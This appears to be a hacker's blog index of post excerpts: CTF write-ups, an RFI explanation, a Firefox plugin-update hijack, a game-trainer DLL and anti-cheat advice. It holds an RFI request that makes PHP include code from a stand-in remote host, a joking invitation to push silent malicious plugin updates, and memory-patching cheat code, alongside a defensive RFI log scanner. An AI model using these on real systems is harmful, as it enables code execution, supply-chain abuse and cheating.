ECTF 2014 write-up (The Annoying Admin)

First of all, this is the first CTF that OpenToAll has actually won first place in.

So proud


Though it was a student CTF and not widely publicized I’m still happy.

Anyway, this is a write-up for the ECTF 2014 challenge “The annoying admin”. The description is below, and please note that we solved it before the hint was provided!

The chat feature was added to the Facelook website and, to test it, the founder of the company sent a message in chat to the admin. The admin reads all the chat messages, but does not reply to anyone. Try to get that chat message and earn the bounty.

Annoying Admin

Hint: Admin likes to visit some links which he receives from people


Pwnium write-up #2 (Breakpoints)

This write-up will be a little rougher on newbies because there won’t be any C++ or hex-rays here.
re300 (Breakpoints) is an x64 ELF binary which I had to boot up my VM to solve!

If you want to play along, download the binary here, get the disassembler of your choice and GDB ready and let’s have a go.

.text:0000000000400550 start           proc near
.text:0000000000400550                 xor     ebp, ebp
.text:0000000000400552                 mov     r9, rdx
.text:0000000000400555                 pop     rsi
.text:0000000000400556                 mov     rdx, rsp
.text:0000000000400559                 and     rsp, 0FFFFFFFFFFFFFFF0h
.text:000000000040055D                 push    rax
.text:000000000040055E                 push    rsp
.text:000000000040055F                 mov     r8, offset nullsub_1
.text:0000000000400566                 mov     rcx, offset sub_4066B0
.text:000000000040056D                 mov     rdi, offset main
.text:0000000000400574                 call    ___libc_start_main
.text:0000000000400579                 hlt
.text:0000000000400579 start           endp

Pwnium write-up #1 (Crackme Fast)

This is a quick write-up of the “Crackme Fast” challenge from Pwnium CTF

Let’s start at the beginning. The challenge stated that you had to download a file from a server, crack that application (retrieve a password from it) and submit it to the authentication server altogether in under 2 seconds. This means the moment the file is downloaded, you have under 2 seconds to finish the challenge to retrieve the flag.

Let’s start with the file itself. When I downloaded the file it saved as “4617155699eb1d2b7a17f7a5bdda27b4.bin”. I then opened it in Notepad++ and xvi32. Notepad++ told me it was some kind of uncompressed archive format containing a single executable. How did I know?


Parsing HTML with C++ (With extra UTF-8 woes)

So I was tasked with making a C++ project that scraped data from HTML pages.

For those who aren’t in the “know”, there’s no neato HTML DOM library like JSoup in C++. There’s nothing with jQuery-like selectors either. There are some niche projects here and there (and there is a google project I was turned onto which I decided probably wasn’t for the best, but worth mentioning anyway) but nothing really substantial.

In PHP, you could do a couple things. Either use “Simple HTML DOM Parser“, or use simplexml with XPath. Both kind of suck for their own reasons (Simple HTML DOM Parser is written in PHP and causes tons of resources to be used for simple operations, and simplexml with XPath is… not fun, turns out C++ isn’t much better, but we’ll get to it later).

In JavaScript, you have jQuery. In Java, JSoup. Both are amazing. If I’m scraping something, I’d prefer to use these… but it’s just too bad I don’t use Java for much else besides android, and I don’t know how well nodejs actually works with jQuery, or if it does, or if it has something similar… I’ve never used node. Maybe worth looking into some day.

C++, though, I had to hack. It’s weird, usually you’ll find C++ libraries for anything but in this case the internet didn’t help me out too much, besides this blog post, so I went with it.

The tools I ended up using for my project:

  • CURL
  • MySQL++
  • libxml++
  • libtidy


Firefox plugin ownership hijacking exploit

So I ran into an interesting issue today.

People develop Mozilla plugins all the time. Some online and on the store, some offline and not on the store at all for all sorts of purposes. Either because they don’t require network access, because they don’t feel they want it known to the general public or because it is proprietary, sensitive software.

Well, a friend designed a plugin which was not designed to be released to the public and something absolutely amazing occurred. Somebody uploaded his plugin to Mozilla AMO. Mozilla AMO is basically the Firefox plugin store.

What’s even more fun is that this person did not specify an Update URL in his manifest. It all came tumbling down.

If the Update URL is not explicitly overridden, Firefox tries to grab updates from Mozilla AMO even if the plugin was not installed from the store originally. Firefox will also grant ownership over your plugin key to whoever uploaded it to the store first, meaning the actual original author has little recourse.

So, if you happen to find some plugins on github or on the web and want to create some bots with little effort, look no further! Simply upload a modified plugin to Mozilla AMO and watch as silent updates are delivered to your victims!

Free software for everyone!

Seriously though, people who have private plugins including secretive individuals and huge corporations beware.

Birth of a hacking brain

Introduction

I haven’t done a post like this ever, but I thought I’d give my account of a phenomenon which was occurring prior to PHP ‘fixing’ its allow_url_include configuration option.

Names of the innocent have been omitted, and details changed to protect, well, me.

Sometime around 2007 a friend of mine made a neat script to parse his access logs. People were trying to exploit his server, repeatedly.
They were attempting an attack known as RFI (Remote File Inclusion).

The concept is simple. PHP has a function called ‘include’; it executes the PHP file given to it:

include('my_file.php');

However, PHP also used to allow you to include remote files by default. This would mean you could do:

include('http://some-other-site.com/test.txt');

People would do things like:

include($_GET['action'] . '.php');

If you did

index.php?action=http://some-other-site.com/test.txt%00

You could include your own PHP file and execute arbitrary code (the %00 null byte terminates the string, so the ‘.php’ the script appends is dropped and the remote file is fetched as-is).

Okay, explanation over!
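The friend’s log parser from the story is not reproduced on the page, so here is an added example of my own (not his script) that does the same job: it scans Apache-style access log lines for the request shape described above, a query parameter whose decoded value is a remote URL, optionally NUL-terminated. The log lines and the host names in them are constructed samples.

```python
"""Flag Remote File Inclusion (RFI) attempts in Apache-style access log lines.
Added example, not the friend's script from the post; it looks for the request
shape described above: a query parameter whose decoded value is a remote URL."""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache "combined" format: ip ident user [ts] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})')
# Schemes include() would fetch while allow_url_include was on by default.
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

def find_rfi_params(target):
    """Return (param, remote_url) pairs for every parameter pointing off-site."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        decoded = unquote(value)  # parse_qsl decoded once; this catches double-encoding
        if REMOTE_RE.match(decoded):
            # %00 ends the string so the appended '.php' is ignored; keep what PHP fetched
            hits.append((name, decoded.split('\x00', 1)[0]))
    return hits

def scan_log(lines):
    """Return one finding per log line that carries an RFI attempt."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line: skip rather than crash the scan
        hits = find_rfi_params(m.group('target'))
        if hits:
            findings.append({'ip': m.group('ip'), 'status': m.group('status'), 'params': hits})
    return findings

# Constructed sample lines (not real traffic); the third is double-encoded
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Mar/2014:12:00:01 +0000] "GET /index.php?action=http://some-other-site.com/test.txt%00 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Mar/2014:12:00:02 +0000] "GET /index.php?action=home HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Mar/2014:12:00:03 +0000] "GET /index.php?page=ftp%253A%252F%252Fsome-other-site.com%252Fshell.txt HTTP/1.1" 404 0 "-" "curl/7.30"',
    'not a log line',
]

if __name__ == '__main__':
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

A 200 status on a flagged line is the one to chase first: it means the include path was reachable, not merely probed.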


HTML5 with Internet Relay Chat (IRC)

I wrote an UnrealIRCd plugin (well, a proof of concept anyway) that would allow HTML5 clients to connect to your server (leaf or hub, I suppose).

The only real benefit to a fully functioning plugin for HTML5 WebSockets is to remove reliance on Java/Flash, or being able to code a client in Javascript, if that’s your thing.

The repo is here, feel free to check it out.

Crazy Game Fun Times – Deer Hunter Tournament and JFK Reloaded

I decided to write some trainers for dumbass games for dumbass fun, why not?

JFK Reloaded Rapid Fire

#include <windows.h>

// This evades the hard-coded bullet record limit (basically, the ballistics screen and replay might fuck up and crash because you shot too many bullets)
DWORD WINAPI lpBallisticSanityThread(LPVOID lpParam) {
    while(true) {
        unsigned long* pdwShotsFired = ( unsigned long* )0x006162AC;

        if( *pdwShotsFired > 0x26 ) {
            *pdwShotsFired = 0x24;
        }

        Sleep(100);
    }

    return 0;
}

// Note: memset_s is called here as (address, byte, count), which is not the C11 memset_s
// signature; it is presumably the author's own code-patching helper (assumption, not shown on the page).
__declspec( noinline ) VOID InstallPatches() {
    memset_s( ( unsigned char* )0x5A1CF8, 0xEB, 1 );
    memset_s( ( unsigned char* )0x59F1FA, 0x90, 2 );
}

BOOL APIENTRY DllMain( HMODULE hModule, DWORD  ul_reason_for_call, LPVOID lpReserved )
{
    if(ul_reason_for_call == DLL_PROCESS_ATTACH) {
        InstallPatches();

        CreateThread(0, 0, lpBallisticSanityThread, 0, 0, 0);
    }

    return TRUE;
}


I really don’t like the Android API

Well, you know me, I seem to be pretty decent at just complaining about things. So, let’s dive right into the Android SDK.

The XML
There is a visual designer, but nobody uses it. Nobody should use it. It’s terrible.

I can’t say it’s the fault of XML inherently, maybe it’s just the editor and the rendering that has major issues, but it’s broken as hell in Eclipse and Android Studio and using it is only useful for widgets or nested fragments.

I don’t like its HTML+CSS-like design. It feels filthy. It could be a lot worse, though, so let’s put aside this gripe and move to the main issue.

The actual API
When I jumped into android programming, I was so frustrated. Super pissed. That’s because I was stuck in the UI design and restoring states, I gave up.

Later on, a very retarded android developer (people actually pay him) told me to use the AndroidManifest.xml hack to let android handle my orientation changes for me.
Holy fucking shit it was like a brand new world!

No more Parcelable classes, no more savedInstanceState bundles… everything was awesome. Of course, this was all placebo, because in the end I needed to change my methods away from the XML configuration hack (because there are many forms of changing states in Android, and it only handles a few of them).

  • I hate how the OS doesn’t handle states itself.
  • I hate that I have to handle states, and I hate that it is so troublesome. You either have to store specific members of a class, or make your class extend Parcelable, which means writing a lot more lines when you really shouldn’t have to.
  • I hate how much extra typing I have to do to deal with savedInstanceState or retained, nested fragments (which is ultimately what I ended up using, a hell of a lot easier than that retarded bundle bullshit).
  • I don’t like how only some of the XML settings for layouts have a method in an object (Like, for ListView you can set ‘divider’ and ‘dividerHeight’ in XML and Java, but you can’t ‘showDividers’; this is a minor example that I had on hand, but it happens all the time).
  • This is an SDK problem, but it’s also a slight Java problem (depending on who you ask) – Overrides lead to ambiguity. That is because the SDK is ambiguous. Yes, there are Fragment and Activity life cycles in the SDK docs, however that lifecycle isn’t always true in every circumstance. Some overrides are only fired in specific circumstances, and sometimes that information is buried in lines of text elsewhere, and you only find out when you get a NullPointerException or some such thing. Annoying.

Full disclosure, I’m not a professional Java developer or anything, and even I can see that in many ways, a lot of my extra burden would be resolved in my projects by extended classes (I do it sometimes, but probably not nearly as much as I should), so many of these points might be moot. I mean, if I can speed up the development of other things, maybe this burden wouldn’t be so heavy? I don’t know, but I know these things are a burden. It really sucks the energy out of me when I have to make another fragment class just to retain data across orientation changes, app kills, minimize/maximize… etc. It takes up a lot of time that I could be spending on other things, and it seems like it could be a lot easier. That’s just me. Maybe I’m wrong.

It could be that I’m a moron and I’m making this way too hard on myself, it’s happened before. If I am indeed a moron, please comment below and tell me how to do this less verbosely.

The good!
What would a rant be without the things I really enjoy?

  • I like Java’s default classes and how extensive string manipulation is, how easy it is, I like the eclipse editor (although people keep trying to push me into studio). There’s a lot of stuff already done for you, like C#.
  • I like the HUGE amount of libraries which solve problems I’ve not had to solve myself by nature of them existing. Jsoup, Picasso, OkHttp and Joda Time are super.
  • Overrides, while being a problem they are also a godsend – because, well, you can override anything. Ignoring the ambiguity of some SDK functions, this allowed me to make some very cool changes to widgets that wouldn’t have been possible in some other languages. So they’re also good in their own way.
  • Another compliment for Java – Strong typing. Weak types pls go.

Anyway, final bit of info, here are some screenshots from an app I’ve been making. It’s dumb animu bullshit but it seems at least 120 people are interested in it, since that’s how big my alpha tester group is (it has 120 users by word of mouth on facebook/twitter/etc, it’s a closed group, pretty impressive I think, especially since it’s only been a couple days).

Anti-hacking advice and methods for the amateur game developer.

I hang around game forums sometimes, and the subject of game development pops up every once in a while. I figured I’d write this for people who are indie or amateur developers who might not necessarily have the money to pay an outside developer to protect their game (You can hire me if you do, by the way), but want their game to be somewhat free of the really, really bad hacks that plague poorly made online games.

This post will talk more about concepts that give the developer nasty results and not so much code. If you want to see some anti-hacking code, there’s a tag for that on my blog! Use it!

The netcode, and never trusting the client to do anything.
In an ideal world (for those who don’t like cheating) games would be run on the cloud and every pixel would be delivered to the client, and they’d only be restricted to sending keyboard and mouse input to the server. This comes with a whole bunch of other problems, but ignore those for a moment and really think about it. If the client was never trusted to do anything or handle any data, there would be no hacking. There’d be no data to input into our ESP or aimbot calculations and there’d be no data to write, such as in our “no recoil” or “no spread” code. This is pretty much how consoles control hacking, by completely locking out the user. It’s not perfect and people do cheat on consoles, but because consoles actively fight against user input it is much more rare.

Having said all that, I am a consumer advocate and I really, really hate that the gaming industry is going in this direction. However, the lesson should not be lost on people who still want to develop video games on the computer today, without those severe controls.
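As an added illustration of the “never trust the client” rule (my own example, not code from this post or any of the games it mentions): the client is allowed to report only its input, where it aimed and that it pulled the trigger, while fire rate, ammo, recoil and spread are owned by the server. A rapid-fire, no-recoil or no-spread patch on the client then has nothing to edit, because the server simply drops the extra clicks and applies its own recoil and randomness. The weapon numbers are assumed tuning values.

```python
"""Server-authoritative shot handling, an added illustration of "never trust the
client" (not code from the post). The client only reports input: it aimed at
(yaw, pitch) and pulled the trigger. Fire rate, ammo, recoil and spread live on
the server, so rapid-fire, no-recoil and no-spread patches have nothing to edit.
All numbers below are assumed tuning values."""
import math
import random
from dataclasses import dataclass

@dataclass
class Weapon:
    fire_interval: float   # minimum seconds between shots
    magazine: int
    kick_deg: float        # upward recoil added per shot
    spread_deg: float      # half-angle of the random spread cone
    recovery_deg_s: float  # recoil recovered per idle second

@dataclass
class Shooter:
    weapon: Weapon
    ammo: int
    last_shot: float = -math.inf
    recoil: float = 0.0    # accumulated kick, owned by the server

class ShotAuthority:
    def __init__(self, seed=0):
        self.rng = random.Random(seed)  # server RNG: client never sees or supplies spread

    def fire(self, s, now, yaw, pitch):
        """Resolve one trigger pull; returns (shot_direction or None, verdict)."""
        if now - s.last_shot < s.weapon.fire_interval:
            return None, 'rate_limited'  # extra clicks from a rapid-fire hack are dropped
        if s.ammo <= 0:
            return None, 'empty'
        s.recoil = max(0.0, s.recoil - (now - s.last_shot) * s.weapon.recovery_deg_s)
        s.ammo -= 1
        s.last_shot = now
        jy = self.rng.uniform(-s.weapon.spread_deg, s.weapon.spread_deg)
        jp = self.rng.uniform(-s.weapon.spread_deg, s.weapon.spread_deg)
        shot = (yaw + jy, pitch + s.recoil + jp)  # server-applied recoil and spread
        s.recoil += s.weapon.kick_deg
        return shot, 'ok'

def simulate(click_times, seed=0):
    """Feed a burst of client trigger pulls at the given times; return verdicts."""
    rifle = Weapon(fire_interval=0.1, magazine=3, kick_deg=1.5, spread_deg=0.5, recovery_deg_s=5.0)
    s = Shooter(rifle, rifle.magazine)
    auth = ShotAuthority(seed)
    return [auth.fire(s, t, 0.0, 0.0)[1] for t in click_times]
```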

Exhibit A: The ARMA franchise

Bad design.

This code allows you to disable all keyboard input for admins on an ARMA server. Really.

I’m starting with ARMA because it uses an engine which defies common sense. It is probably the least secure, most insane multiplayer game design I’ve ever seen. It’s bizarre.
